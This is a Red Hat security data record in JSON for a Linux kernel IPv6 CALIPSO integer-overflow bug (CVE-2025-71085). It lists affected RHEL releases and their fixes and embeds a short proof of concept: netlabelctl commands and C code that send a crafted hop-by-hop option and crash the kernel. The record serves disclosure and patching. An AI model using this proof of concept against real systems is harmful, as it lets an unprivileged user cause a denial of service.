{
  "threat_severity" : "Moderate",
  "public_date" : "2026-01-13T00:00:00Z",
  "bugzilla" : {
    "description" : "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
    "id" : "2429026",
    "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
  },
  "cvss3" : {
    "cvss3_base_score" : "7.5",
    "cvss3_scoring_vector" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    "status" : "verified"
  },
  "cwe" : "CWE-190",
  "details" : [ "In the Linux kernel, the following vulnerability has been resolved:\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\nThere exists a kernel oops caused by a BUG_ON(nhead < 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom > INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) < 0).\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\nPoC:\nUsing `netlabelctl` tool:\nnetlabelctl map del default\nnetlabelctl calipso add pass doi:7\nnetlabelctl map add default address:0::1/128 protocol:calipso,7\nThen run the following PoC:\nint fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n// setup msghdr\nint cmsg_size = 2;\nint cmsg_len = 0x60;\nstruct msghdr msg;\nstruct sockaddr_in6 dest_addr;\nstruct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\nsizeof(struct cmsghdr) + cmsg_len);\nmsg.msg_name = &dest_addr;\nmsg.msg_namelen = sizeof(dest_addr);\nmsg.msg_iov = NULL;\nmsg.msg_iovlen = 0;\nmsg.msg_control = cmsg;\nmsg.msg_controllen = cmsg_len;\nmsg.msg_flags = 0;\n// setup sockaddr\ndest_addr.sin6_family = AF_INET6;\ndest_addr.sin6_port = htons(31337);\ndest_addr.sin6_flowinfo = htonl(31337);\ndest_addr.sin6_addr = in6addr_loopback;\ndest_addr.sin6_scope_id = 31337;\n// setup cmsghdr\ncmsg->cmsg_len = cmsg_len;\ncmsg->cmsg_level = IPPROTO_IPV6;\ncmsg->cmsg_type = IPV6_HOPOPTS;\nchar * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\nhop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\nsendmsg(fd, &msg, 0);" ],
  "statement" : "This vulnerability allows an unprivileged user to trigger a kernel BUG by causing an integer overflow in the headroom calculation used by skb_cow(), which results in a negative size passed to pskb_expand_head(). The kernel subsequently hits a reachable BUG_ON() and crashes, leading to a reliable denial-of-service condition. In worst-case scenarios, this path may be reachable via crafted IPv6 traffic with CALIPSO options.",
  "affected_release" : [ {
    "product_name" : "Red Hat Enterprise Linux 10",
    "release_date" : "2026-03-09T00:00:00Z",
    "advisory" : "RHSA-2026:4012",
    "cpe" : "cpe:/o:redhat:enterprise_linux:10.1",
    "package" : "kernel-0:6.12.0-124.43.1.el10_1"
  }, {
    "product_name" : "Red Hat Enterprise Linux 10.0 Extended Update Support",
    "release_date" : "2026-03-30T00:00:00Z",
    "advisory" : "RHSA-2026:6193",
    "cpe" : "cpe:/o:redhat:enterprise_linux_eus:10.0",
    "package" : "kernel-0:6.12.0-55.65.1.el10_0"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8",
    "release_date" : "2026-03-09T00:00:00Z",
    "advisory" : "RHSA-2026:3964",
    "cpe" : "cpe:/a:redhat:enterprise_linux:8::nfv",
    "package" : "kernel-rt-0:4.18.0-553.111.1.rt7.452.el8_10"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8",
    "release_date" : "2026-03-09T00:00:00Z",
    "advisory" : "RHSA-2026:3963",
    "cpe" : "cpe:/o:redhat:enterprise_linux:8",
    "package" : "kernel-0:4.18.0-553.111.1.el8_10"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.2 Advanced Update Support",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5727",
    "cpe" : "cpe:/o:redhat:rhel_aus:8.2",
    "package" : "kernel-0:4.18.0-193.190.1.el8_2"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5691",
    "cpe" : "cpe:/o:redhat:rhel_aus:8.6",
    "package" : "kernel-0:4.18.0-372.185.1.el8_6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.6 Telecommunications Update Service",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5691",
    "cpe" : "cpe:/o:redhat:rhel_tus:8.6",
    "package" : "kernel-0:4.18.0-372.185.1.el8_6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5691",
    "cpe" : "cpe:/o:redhat:rhel_e4s:8.6",
    "package" : "kernel-0:4.18.0-372.185.1.el8_6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.8 Telecommunications Update Service",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5689",
    "cpe" : "cpe:/o:redhat:rhel_tus:8.8",
    "package" : "kernel-0:4.18.0-477.133.1.el8_8"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5689",
    "cpe" : "cpe:/o:redhat:rhel_e4s:8.8",
    "package" : "kernel-0:4.18.0-477.133.1.el8_8"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9",
    "release_date" : "2026-03-02T00:00:00Z",
    "advisory" : "RHSA-2026:3488",
    "cpe" : "cpe:/a:redhat:enterprise_linux:9",
    "package" : "kernel-0:5.14.0-611.36.1.el9_7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9",
    "release_date" : "2026-03-02T00:00:00Z",
    "advisory" : "RHSA-2026:3488",
    "cpe" : "cpe:/o:redhat:enterprise_linux:9",
    "package" : "kernel-0:5.14.0-611.36.1.el9_7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5693",
    "cpe" : "cpe:/a:redhat:rhel_e4s:9.0",
    "package" : "kernel-0:5.14.0-70.171.1.el9_0"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5732",
    "cpe" : "cpe:/a:redhat:rhel_e4s:9.0::nfv",
    "package" : "kernel-rt-0:5.14.0-70.171.1.rt21.243.el9_0"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5813",
    "cpe" : "cpe:/a:redhat:rhel_e4s:9.2",
    "package" : "kernel-0:5.14.0-284.161.1.el9_2"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions",
    "release_date" : "2026-03-25T00:00:00Z",
    "advisory" : "RHSA-2026:5690",
    "cpe" : "cpe:/a:redhat:rhel_e4s:9.2::nfv",
    "package" : "kernel-rt-0:5.14.0-284.161.1.rt14.446.el9_2"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.4 Extended Update Support",
    "release_date" : "2026-03-11T00:00:00Z",
    "advisory" : "RHSA-2026:4246",
    "cpe" : "cpe:/a:redhat:rhel_eus:9.4",
    "package" : "kernel-0:5.14.0-427.114.1.el9_4"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.6 Extended Update Support",
    "release_date" : "2026-03-17T00:00:00Z",
    "advisory" : "RHSA-2026:4745",
    "cpe" : "cpe:/a:redhat:rhel_eus:9.6",
    "package" : "kernel-0:5.14.0-570.98.1.el9_6"
  } ],
  "package_state" : [ {
    "product_name" : "Red Hat Enterprise Linux 6",
    "fix_state" : "Not affected",
    "package_name" : "kernel",
    "cpe" : "cpe:/o:redhat:enterprise_linux:6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 7",
    "fix_state" : "Not affected",
    "package_name" : "kernel",
    "cpe" : "cpe:/o:redhat:enterprise_linux:7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 7",
    "fix_state" : "Not affected",
    "package_name" : "kernel-rt",
    "cpe" : "cpe:/o:redhat:enterprise_linux:7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9",
    "fix_state" : "Affected",
    "package_name" : "kernel-rt",
    "cpe" : "cpe:/o:redhat:enterprise_linux:9"
  } ],
  "references" : [ "https://www.cve.org/CVERecord?id=CVE-2025-71085\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-71085\nhttps://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/T" ],
  "name" : "CVE-2025-71085",
  "mitigation" : {
    "value" : "Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
    "lang" : "en:us"
  },
  "csaw" : false
}